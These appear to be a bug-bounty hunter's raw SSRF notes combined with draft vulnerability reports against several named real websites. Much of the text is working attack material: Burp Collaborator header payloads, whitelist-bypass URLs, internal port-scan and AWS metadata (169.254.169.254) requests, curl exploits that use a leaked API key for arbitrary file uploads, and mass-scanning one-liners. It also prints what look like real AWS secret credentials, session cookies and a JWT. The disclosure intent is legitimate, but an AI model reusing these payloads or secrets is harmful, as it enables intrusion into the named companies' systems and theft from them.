SSRF

IMP
1. HTTP request is imp
2. Even if HTTP check , Check the IP address
3. DNS interaction is no of use
4. Exploit it then report

PORT SCAN
BACKEND SCAN
DOS
FETCH METADATA
FILE OVER PORT SCAN

GET / POST

client.com/user/system?file=https://localhost/adi.xml

client.com/user/system?url=https://evil.com/adi.xml
client.com/user/system?url=https://127.0.0.1/adi.xml

Mistakes

Register Form : name@burp.net

Check IP : OWN = NO SSRF

Where SSRF ?

1. Add link
2. Enter URL
3. Insert bio
4. Verify Link
5. Upload document

Rare: Headers

TOOLS:
Burp Collaborator
Intruder
Repeater
Ext : Collaborator Everywhere

Headers :

From: root@q1s8668z0onpmv1fx3ldythr0i69x1lq.burpcollaborator.net
Client-IP: spoofed.75apancg45r6qc5w1kpu2al84zaq1jp8.burpcollaborator.net
CF-Connecting_IP: spoofed.ho9ztxvqnfag9mo6ku84lk4in9t0ku8j.burpcollaborator.net
X-Wap-Profile: http://z77hcfe86xtys47o3crm42n06rci3dr2.burpcollaborator.net/wap.xml
X-Real-IP: spoofed.ua8cfah39swtvzaj67uh7xqv9mfd69uy.burpcollaborator.net
X-Client-IP: spoofed.hcxzhxjqbfygxmc68uw49ksib9h08xwm.burpcollaborator.net
X-Forwarded-For: spoofed.roj9t7v0npaq9wogk48elu4snjtak98y.burpcollaborator.net
X-Originating-IP: spoofed.bm1trrtkl98a7gm0io6yje2cl3ruiv6k.burpcollaborator.net
Forwarded:
for=spoofed.ome6r4txlm8n7tmdi16bjr2plgr7i96y.burpcollaborator.net;by=spoofed.ome6r4
txlm8n7tmdi16bjr2plgr7i96y.burpcollaborator.net;host=spoofed.ome6r4txlm8n7tmdi16bjr
2plgr7i96y.burpcollaborator.net
Contact: root@wyye3c55xukvj1ylu9ijvzexxo3fuii7.burpcollaborator.net
True-Client-IP: spoofed.uhfcmao3gs3t2zhjd71hexxvgmmddh16.burpcollaborator.net

1. Check URL function

2. Burp.net
3. HTTP request
4. Whois IP

1. Cross PORT scan

HTTP request , Time delay

HTTP : OPEN
DNS : Filtered/Closed
No request : Closed
80 HTTP OPEN
443 DNS Filtered / Closed
5901 NO request + Time delay
22 No request + Time delay

2. DOS

identify time delay port

send request to intruder
perform multiple times
look for 502,503

3. Backend system scan

255.255.255.0

HTTP IP =
my 3
mum dad sis 3
4 host are alive

80 Open
22 Closed
8443 Open
443 : OPEN
8080 Filtered
10000
3306
25
21

site.com/user/profile?
img=z.site.com.x64csz8rc1wlfdpywc9ychbpegk68v.burpcollaborator.net/adi.png
https://quizlet.com/cdn-cgi/image/f=auto,fit=cover,h=100,onerror=redirect,w=120/
https://o.quizlet.com.x64csz8rc1wlfdpywc9ychbpegk68v.burpcollaborator.net/
QwyVU9wD0JGv9II29DyjUg.jpg
#
@
.

http://[::]:8080/jp2/14933009023351.jp2
subs
wayback
grep cdn
look for img
bypass with tags @ # .

https://quizlet.com/cdn-cgi/image/f=auto,fit=cover,h=100,onerror=redirect,w=120/
https://
farm1.staticflickr.com@615pcsnienat67065o6uulidm4swgl.burpcollaborator.net/
175/455279239_720dfc98c8.jpg

proxy
page
width
url
redirect
file
height
cdn-cgi
localhost

Hi ipsy team,

Aditya here , I found critical security issues in one of your subdomain . Please
look into it

Title: SSRF leads to internal port scan and disclosing information about AWS
metadata
Severity : P1

Description:
The ability to trigger arbitrary external service interactions does not constitute
a vulnerability in its own right, and in some cases might even be the intended
behavior of the application. However, in many cases, it can indicate a
vulnerability with serious consequences. Appending special characters/payloads in
GET based URL gives information.

Endpoint: https://images.shopper.ipsy.com/720,fit,q85/payload_here

Steps for port scan:

1. https://images.shopper.ipsy.com/720,fit,q85/http://localhost:8080
2. After "localhost:" add ports like 8080,22,21,25 and see the response
80
image.png
image.png

URLs

Port Scan

https://images.shopper.ipsy.com/720,fit,q85/http://localhost:8080
https://images.shopper.ipsy.com/720,fit,q85/http://localhost:22

AWS Metadata URL:

https://images.shopper.ipsy.com/300,fit,q1/http://169.254.169.254/latest/meta-
data/iam/security-credentials/imageproxy_server

Disclosed Data:
{
"Code" : "Success",
"LastUpdated" : "2022-01-29T08:50:42Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIARD6GXVWXRFRNHUOO",
"SecretAccessKey" : "zAjOKFFliRgAoQwwlVvjUh+5qCUoMwTUwR9Q8rbd",
"Token" :
"IQoJb3JpZ2luX2VjEMH//////////wEaCXVzLWVhc3QtMSJHMEUCIQDngpLHpcc0SUbQRcvq1+YWoIkIgx
ub2xYC2XLjbjpMAgIgIxoyoPHR+D9+h+dZqDbh5VmfP0BhOZpsA040nDcOSpkqgwQI6v//////////
ARADGgwwNzcxODkzMjgzMDMiDMXFebMKEq8i7UrFnCrXAw2EI4Uq6KcUeSJ/
6hx+TdeALNPSp+rUZGEZxSXEVcgDbeUbaitQpQiD+0IlzlMfCdyKEx2EVLy6boKMNZp8WUqiNQ9l6m7WQwh
JQZpNoIq9R0Z8xbLPb1nqekNsw0g/8M91+4E7padeMeluSaY8eRPB0kHYoV3dX6Q7hmwPr65EA3/
PSiyr847ALsmgFiCWe5x2pUwp7J9ACKH1S9an4Ins8XUtCboGdKS1IOjSPcL1cQdkoanBv/
g74jHYEyLZO9vQ3PKMvDTpGTlsCkIk0gIofPrYjuUs7bWhMkZK4hfkdiv3/
q5fqN+K6B2CXMkIf6guHuxcmAYn+ro9dGYrkbmxUBIEVvSmfZbmQJ6xJpiletRxQC+EMcI/7ykrQ/
X9MU+4I2AzmA9nOqURJH5F+8BK96etpf4aLYn2FviolQ7JrzLAEnJyawAjbfZ2v0azQOEYeJ8AP9h6akGQT
mwDIp4Yaj6YYqyZQfOkVW8yLSH06gWPcT/7BUAnTWvAQpMSa5S4NEexgF2kZZS9FpPzFHvrRE/
SeVENP+JsmJBbQpVAFpN4gBwYPm2sll35ckyuvcddJ5WpbOK61jwRkYzvwTU2HLeRh9j2ec9qjTUt4DihE3
8d0++TojCHgNSPBjqlAZ7W3iRIZvN6MXnYgHwSkJa8Cq6IZRHT2N1AhKilXRu8F/
i+AKtJc3WX3V8QoccFV4BTavfcSWUPOIAyJFgWfAhFLziVixWh4egkUu4mox6fx32Ggbi3BVTQoww7oODkW
tdIX4U4hjwDPJj2Kah7q93Wi0I492t7gK2ymakQtvpgAT4f2kpflSshtRbrxqN7yIgrpoL0iaIs3h6P6Emd
Wc9QZayKUw==",
"Expiration" : "2022-01-29T15:02:44Z"
}

Hello knaw team,

I aditya found security issue in your system where SSRF is leading to port scan

Title: Internal SSRF to scan ports and force to make HTTP request

Description:
The ability to trigger arbitrary external service interactions does not constitute
a vulnerability in its own right, and in some cases might even be the intended
behavior of the application. However, in many cases, it can indicate a
vulnerability with serious consequences. Appending special characters/payloads in
GET based URL gives information.

Steps:
1. Open URL https://tomcat.tiler01.huygens.knaw.nl/adore-djatoka/viewer2.1.html?
rft_id=http://localhost:8080/jp2/14759615811661.jp2
On port 8080 its giving instant response
2.https://tomcat.tiler01.huygens.knaw.nl/adore-djatoka/viewer2.1.html?
rft_id=http://localhost:80/jp2/14759615811661.jp2
Its giving slow response or taking time to response
3. https://tomcat.tiler01.huygens.knaw.nl/adore-djatoka/viewer2.1.html?
rft_id=http://localhost:8080/jp2/14759615811661.jp2
Changed localhost to 127.0.0.1 , 0.0.0.0 , [::]
4. Capture URL in burp suite > Send to intruder
5. Add port position as attacking position "8080"
6. Go to payloads > numbers > from 1 to 10000 | step 1 = Start attack
7. Observe the response where port 8080 is giving 200 OK and remaining are giving
404 etc

Impact:
As an attacker I am able to perform port scan internally , localhost payloads
working (Blacklist payload) . Able to induce server to make HTTP request on
different ports like 8080,443,80(DNS)
POC:

image.png

502
503

Hello team,

I aditya shende found Blind SSRF whitelist bypass in one of your subdomain. Please
look into it.

Aditya here found Blind SSRF whitelist bypass.

What is blind SSRF?

Blind SSRF vulnerabilities arise when an application can be induced to issue a
back-end HTTP request to a supplied URL, but the response from the back-end request
is not returned in the application's front-end response.

What is the impact of blind SSRF vulnerabilities?

The impact of blind SSRF vulnerabilities is often lower than fully informed SSRF
vulnerabilities because of their one-way nature. They cannot be trivially exploited
to retrieve sensitive data from back-end systems, although in some situations they
can be exploited to achieve full remote code execution.

Steps:
1. Open URL:
https://process.fs.grailed.com/AJdAgnqCST4iPtnUxiGtTz/auto_image/cache=expiry:max/
rotate=deg:exif/resize=height:1400/output=quality:70/compress/https://
cdn.fs.grailed.com/api/file/AKXqF3qXSX2Fa1ih5O7X
2. After CDN domain enter collaborator link to check response
3. Final URL :
https://process.fs.grailed.com/AJdAgnqCST4iPtnUxiGtTz/auto_image/cache=expiry:max/
rotate=deg:exif/resize=height:1400/output=quality:70/compress/https://
cdn.fs.grailed.com@cgwhcsjw1tmkmnmnq01z1vh9q0wqkf.burpcollaborator.net/api/file/
AKXqF3qXSX2Fa1ih5O7X

POC attached

SSRF
AWS SSRF detection
Whitelist bypass
Report Writing
BAC

csrf token
boomr key
bugsnag key

site.com/index.php?id=169.254.169.254/abc.xml

APIPA range : 169.254.169.254/latest

169.254.0.1 to 169.254.255.254
Payloads:

http://169.254.169.254/latest
http://169.254.169.254/latest

Tip : Grep this

proxy
page
forward
proxy_url
width
cdn
cdn-cgi

cat domains.txt | waybackurls | grep keyword

===================================================================================
====================

Whitelist SSRF

1. site using another site

cdn-cgi

https://quizlet.com/cdn-cgi/image/f=auto,fit=cover,h=100,onerror=redirect,w=120/
https://o.quizlet.com/BxagYHADfejrpW8u9Dts2Q.jpg

@
.
#

{
"message": "Password changed"
}

Function: Update password using old password

Title: Able to update password using wrong password or blank password

Description:

Function is to change password which requires original password but using JSON
valid response attacker can still change password using random sting. When setting
a new password for a user, the product does not require knowledge of the original
password, or using another form of authentication. This could be used by an
attacker to change passwords for another user, thus gaining the privileges
associated with that user.

Steps:

1. Login https://my.sirv.com
2. Navigate to https://my.sirv.com/#/account/settings/personal
3. Perform password change and capture all activity in burpsuite (Include request &
response)
4. While change password enter random string and check response
5. Change status code to 200 OK
6. Response body
{
"message": "Password has been chnaged"
}
7. Forward request
POST request
POST /api/user/password/change HTTP/1.1
Host: my.sirv.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101
Firefox/105.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://my.sirv.com/
Content-Type: application/json
X-XSRF-TOKEN: Fb4dLVfU-bmQEPee_msubNyVlXeZNBCfFHRs
Content-Length: 51
Origin: https://my.sirv.com
Connection: close
Cookie: _gcl_au=1.1.861271286.1665914702;
_ga_2HNNN02Y53=GS1.1.1665914702.1.0.1665914709.53.0.0;
_ga=GA1.2.185094497.1665914703; OptanonConsent=landingPath=https%3A%2F%2Fsirv.com
%2F&datestamp=Sun+Oct+16+2022+15%3A35%3A04+GMT%2B0530+
(India+Standard+Time)&version=3.6.22&groups=1%3A1%2C2%3A1%2C4%3A1%2C0_22727%3A1%2C1
01%3A1%2C102%3A1%2C103%3A1; _gid=GA1.2.1980943792.1665914704; XSRF-TOKEN=Fb4dLVfU-
bmQEPee_msubNyVlXeZNBCfFHRs; sirv_session=21LCv-
G7trDrPaAeyO6Vog.jpgI1yzZamKCgtzR84mHBq4byRxJJkCEbR9ghGpuvLrVaw90r5QBqhiTilPyqBx1dg
N4fN1zr7NzUhE36XynRx_YHNekKaW-byOf_WDdsmiRoX-
WItrNw3fFoo3DTeHTChrb9lbbxuiWSj68OO8MflRtprHrxk5wihvECFUPaMVbE0iopDlN8yzTdJrP4O8Ajg
ZaRjVamcRfGDZ3nsq7qX6UPgVyWzpWlTLqcic76DWRVxRXIs6jMXNqBboqiG2FLs0XSbQk2mAld9gbeaWos
cqms3mI5czTNCadPpXczWyAtvN7p7pXEgKNsxYPsIkOQHbpffKrJYWvhWjExXU0K4JYueUObsu4YEE8L1z9
ls4.1665914710689.604800000.sspANxXvd3wFncHuOsL3ZhCJHq8y4ZVrRP59VYCXwS0;
_ga_J0FW6VX2VL=GS1.1.1665914713.1.1.1665915971.58.0.0;
_hjSessionUser_260836=eyJpZCI6Ijc1MWY3YWFiLTI0MWUtNWQ0NC1hOTRkLTMyOGU3YTNiZDMxZSIsI
mNyZWF0ZWQiOjE2NjU5MTQ3MTQ4OTEsImV4aXN0aW5nIjpmYWxzZX0=; _hjFirstSeen=1;
_hjIncludedInSessionSample=0;
_hjSession_260836=eyJpZCI6IjhjZGU2YWFmLWU5NmMtNGQ0NS1hMzQ0LTc0MGQzMTI3NzkyZSIsImNyZ
WF0ZWQiOjE2NjU5MTQ3MTQ4OTcsImluU2FtcGxlIjpmYWxzZX0=; _hjIncludedInPageviewSample=1;
_hjAbsoluteSessionInProgress=0; _fbp=fb.1.1665914751786.1183435226
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"password":"AAA","newPassword":"AAAAAAAAAAAAAAAA"}

Response:

HTTP/1.1 403 Forbidden

Date: Sun, 16 Oct 2022 10:28:53 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Set-Cookie: XSRF-TOKEN=HHk2D8Gg-v3pIHnhk_kb1gXrkkOEs85hs7LQ; Path=/
Cache-Control: no-cache
Pragma: no-cache
ETag: W/"48-E/6WXecTPHFbJfs25zBaDg"
Server: Sirv.UI
X-Sirv-Server: c1-fireball-7
X-Frame-Options: SAMEORIGIN
Content-Length: 72
{
"name": "ApiForbiddenError",
"message": "Password is incorrect."
}

Impact:

1. Insecure design mechanism represent weak auth

2. Any unauth actor can abuse this bug to update third party actor creds
3. Session is not expiring and validating over status code and response body
4. Must include encrypted tokens or values in response

Hi ipsy team,

Aditya here , I found critical security issues in one of your subdomain . Please
look into it

Title: SSRF leads to internal port scan and disclosing information about AWS
metadata
Severity : P1

Description:
The ability to trigger arbitrary external service interactions does not constitute
a vulnerability in its own right, and in some cases might even be the intended
behavior of the application. However, in many cases, it can indicate a
vulnerability with serious consequences. Appending special characters/payloads in
GET based URL gives information.

Endpoint: https://images.shopper.ipsy.com/720,fit,q85/payload_here

Steps for port scan:

1. https://images.shopper.ipsy.com/720,fit,q85/http://localhost:8080
2. After "localhost:" add ports like 8080,22,21,25 and see the response

80
image.png
image.png

URLs

Port Scan

https://images.shopper.ipsy.com/720,fit,q85/http://localhost:8080
https://images.shopper.ipsy.com/720,fit,q85/http://localhost:22

AWS Metadata URL:

https://images.shopper.ipsy.com/300,fit,q1/http://169.254.169.254/latest/meta-
data/iam/security-credentials/imageproxy_server

Disclosed Data:
{
"Code" : "Success",
"LastUpdated" : "2022-01-29T08:50:42Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIARD6GXVWXRFRNHUOO",
"SecretAccessKey" : "zAjOKFFliRgAoQwwlVvjUh+5qCUoMwTUwR9Q8rbd",
"Token" :
"IQoJb3JpZ2luX2VjEMH//////////wEaCXVzLWVhc3QtMSJHMEUCIQDngpLHpcc0SUbQRcvq1+YWoIkIgx
ub2xYC2XLjbjpMAgIgIxoyoPHR+D9+h+dZqDbh5VmfP0BhOZpsA040nDcOSpkqgwQI6v//////////
ARADGgwwNzcxODkzMjgzMDMiDMXFebMKEq8i7UrFnCrXAw2EI4Uq6KcUeSJ/
6hx+TdeALNPSp+rUZGEZxSXEVcgDbeUbaitQpQiD+0IlzlMfCdyKEx2EVLy6boKMNZp8WUqiNQ9l6m7WQwh
JQZpNoIq9R0Z8xbLPb1nqekNsw0g/8M91+4E7padeMeluSaY8eRPB0kHYoV3dX6Q7hmwPr65EA3/
PSiyr847ALsmgFiCWe5x2pUwp7J9ACKH1S9an4Ins8XUtCboGdKS1IOjSPcL1cQdkoanBv/
g74jHYEyLZO9vQ3PKMvDTpGTlsCkIk0gIofPrYjuUs7bWhMkZK4hfkdiv3/
q5fqN+K6B2CXMkIf6guHuxcmAYn+ro9dGYrkbmxUBIEVvSmfZbmQJ6xJpiletRxQC+EMcI/7ykrQ/
X9MU+4I2AzmA9nOqURJH5F+8BK96etpf4aLYn2FviolQ7JrzLAEnJyawAjbfZ2v0azQOEYeJ8AP9h6akGQT
mwDIp4Yaj6YYqyZQfOkVW8yLSH06gWPcT/7BUAnTWvAQpMSa5S4NEexgF2kZZS9FpPzFHvrRE/
SeVENP+JsmJBbQpVAFpN4gBwYPm2sll35ckyuvcddJ5WpbOK61jwRkYzvwTU2HLeRh9j2ec9qjTUt4DihE3
8d0++TojCHgNSPBjqlAZ7W3iRIZvN6MXnYgHwSkJa8Cq6IZRHT2N1AhKilXRu8F/
i+AKtJc3WX3V8QoccFV4BTavfcSWUPOIAyJFgWfAhFLziVixWh4egkUu4mox6fx32Ggbi3BVTQoww7oODkW
tdIX4U4hjwDPJj2Kah7q93Wi0I492t7gK2ymakQtvpgAT4f2kpflSshtRbrxqN7yIgrpoL0iaIs3h6P6Emd
Wc9QZayKUw==",
"Expiration" : "2022-01-29T15:02:44Z"
}

I aditya shende found critical vulnerability , I hope you remember me ;).

Title: API config endpoint disclosed sensitive key which leads to unauthorised file
upload in grailed domain.

Description:
APIs tend to expose endpoints that handle object identifiers, creating a wide
attack surface Level Access Control issue. Object-level authorization checks should
be considered in every function that accesses a data source using an input from the
user.” - OWASP*
Since APIs enable access to objects, if authorization is broken there is a wide
attack area. Thus, authorization to API-accessible objects must be secured.

Solution: Use an API gateway and implement object-level authorization checks.

Require access tokens to permit access, and only allow access to those with the
proper authorization credentials.
Steps.
1. Visit grailed.com/api/config
2. Search for : "key" and "url" keyword (remove quotes)

Info found:
filepicker_key":"AJdAgnqCST4iPtnUxiGtTz

https://process.fs.grailed.com

Exploit:
curl -X POST \
-d url="https://www.3cx.com/wp-content/uploads/2020/08/3-signs-been-hacked.jpg"
\
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

In this I fetched file from another website to upload

Using this any attacker or bad person can upload a file into your website which may
lead to impersionating profile or reputation issue.
There are multiple attacks we can perform using keys but I chose file upload and
this bug is really CRITICAL so patch it ASAP

POC attached ;

Hello team,

Using this I can also perform B-SSRF where I have to insert my server URL :
Exploit:
curl -X POST \
-d url="https://myserver.net/any.png" \
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

Also I can upload heavy based image which called as pixel flood attack

Reference : https://hackerone.com/reports/390

Hello team,

I escalated this issue to exif metadata vulnerability .

Title : File upload vulnerable for exif metadata disclosure

Summary:
When a user uploads an image in example.com, the uploaded image’s EXIF Geolocation
Data does not get stripped. As a result, anyone can get sensitive information of
example.com users like their Geolocation, their Device information like Device
Name, Version, Software & Software version used etc.

Exploit:

curl -X POST \
-d url="https://events.eurid.eu/media/upload/tedex_2012-2790.jpg" \
 "https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

Step
1. When the file is uploaded go to http://exif.regex.info/exif.cgi
2. Copy path : https://cdn.fs.grailed.com/nr71rkw1QdmC105JyQ2B
3. Click on view image metadata

Reference :
https://kathan19.gitbook.io/howtohunt/exif-geo-data-not-stripped/exif_geo

EXPLOIT

POST /links/website HTTP/1.1

Host: backend-2.short.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101
Firefox/106.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 105
Origin: https://app.short.io
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Authorization: JWT
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImY4MWE3MWNiLWE4YjMtNDUzMC1hYzVlLTQ5Ym
ZhZmYyOTQzYiIsInVzZXJfaWQiOjU2Nzc0NSwiZW1haWwiOiJjZnZnaGJAZ21haWwuY29tIiwibG9naW5Ia
XN0b3J5SWQiOiIwMjUwNDU5NC1mZTkyLTRlZDAtOTVjNC1hZjhlNDRkYmEyNDgiLCJpYXQiOjE2NjcxMjQy
NDIsImV4cCI6MTY2OTcxNjI0MiwiaXNzIjoiYXV0aG9yaXplciJ9.dn1j9DHVzqNBU6tFpLguMQBiEtRlxD
iqgJds9D5lwgw
Referer: https://app.short.io/
Connection: close

{"originalURL":"http://
54.224.33.106","domain":"5jlw.short.gy","source":"website","allowDuplicates":true}

SSRF automation

subfinder -d target.com | httpx | tee subs.txt | sleep 3600; | cat subs.txt |

waybackurls | tee data.txt | sleep 3600; | cat data.txt | gf ssrf | tee ssrf.txt

cat data.txt | grep "=" | qsreplace

"hj4w5jlbpl95sx2i9wmip1o9r0xrlg.burpcollaborator.net" | tee ssrf.txt; ffuf -c -w
ssrf.txt -u FUZZ
https://process.fs.grailed.com/AJdAgnqCST4iPtnUxiGtTz/cache/u003dexpiry:max/
rotate/u003ddeg:exif/resize/u003dheight:700,fit:scale/output/
u003dformat:webp,quality:90/compress/https://cdn.fs.grailed.com/api/file/
s9KfeMqTUyGnmrlO2ugz

SSRF automation

subfinder -d target.com | httpx | tee subs.txt | sleep 3600; | cat subs.txt |

waybackurls | tee data.txt | sleep 3600; | cat data.txt | gf ssrf | tee ssrf.txt

cat data.txt | grep "=" | qsreplace "http://169.254.169.254/latest" | tee ssrf.txt;

ffuf -c -w ssrf.txt -u FUZZ
cat data.txt | grep "=" | qsreplace "https://169.254.169.254/latest" | tee
ssrf.txt; ffuf -c -w ssrf.txt -u FUZZ
cat data.txt | grep "=" | qsreplace "169.254.169.254/latest" | tee ssrf.txt; ffuf -
c -w ssrf.txt -u FUZZ

echo 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud | waybackurls | grep "="

| qsreplace "http://169.254.169.254/latest" |

proxy=
page=
img=
red=
url=

APIPA: 169.254.169.254

payload:

http://169.254.169.254/latest
https://169.254.169.254/latest
169.254.169.254/latest

1. Detection
2. Exploit
3. Automate

cat data.txt | gf ssrf